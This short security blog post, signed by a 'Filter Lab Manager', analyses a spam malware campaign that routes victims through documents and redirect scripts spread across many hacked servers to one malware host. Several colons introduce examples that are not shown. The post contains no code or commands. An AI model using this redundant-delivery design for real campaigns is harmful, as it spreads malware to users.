A major malware campaign is beeing conducted since several weeks. Beyond the facts, that is the operating mode that draws our attention as it demonstrates the growing sophistication of spammers. Following the example of fast flux service networks, spammers have set up a mechanism to increase the availability of resources involved in the spread of the malware, which eventually maximizes their return on investment. Analysis of an Active Malware Campaign.
For this purpose the spammer has a hacked servers pool, and a single server hosting the malware. The spam contains, classically, a link to a document hosted on a hacked server:
This document contains several references to the same script, which itself is hosted on several hacked servers:
This redirect will load the malware, which is hosted on a server that probably belongs to the spammer.
All other spam messages of this campaign proceed in the same way: they contain a link to a document hosted by a server in the pool of hacked servers, which itself runs the redirection script located on multiple servers in the pool of hacked servers. The spammer thus has an optimal mesh: to defeat it, it will be necessary to fix all hacked servers or to shut down the site hosting the malware.
I hope you Enjoy this Analysis of an Active Malware Campaign
Filter Lab Manager